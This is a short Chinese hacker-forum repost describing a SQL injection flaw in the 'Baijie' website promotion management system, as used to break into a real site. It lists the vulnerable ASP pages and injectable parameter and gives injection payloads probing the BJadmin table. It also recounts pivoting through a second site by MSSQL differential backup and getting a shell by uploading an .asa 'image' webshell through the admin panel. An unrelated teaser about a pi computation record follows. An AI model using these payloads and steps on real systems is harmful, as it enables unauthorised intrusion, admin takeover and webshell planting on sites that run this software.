百捷网站推广管理系统 注入漏洞

By    老鬼    首发：90sec.org

用这程序的都是百度推广站。目标A站有注入点，搞不到表名。各种蛋痛的跳过，找了同程序的B站 旁了个站mssql差异备份拿到了同程序的B站shell。。down了程序。找到了表名。注入进后台拿到A站权限。目的达到。

注入文件：

news_detail.asp

fpshow.asp?Product_ParentID=4&Product_ID=31;--   注入漏洞

and exists(select * from [BJadmin]）   表名

and exists(select

输入密码查看隐藏内容

from [BJadmin])       用户名是title这个字段里面

手工猜字段麻烦 用工具吧。

shell拿 就在后台 上传的地方传个 asa的图片一句话

转自：http://www.90sec.org/viewthread.php?tid=2446&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

文章来源于lcx.cc:百捷网站推广管理系统 注入漏洞

相关推荐: 狂人用26台N卡电脑打破pi值运算记录

3月14日，新的pi（π）值运算记录诞生，来自美国加利福尼亚州圣克拉拉大学的研究员Ed Karrels宣布第八千万亿位的十进制数字是‘0’。 为了达成这一记录，Ed Karrels通过NVIDIA CUDA设计了一套运算程序，并使用1台配备4块GTX 690显…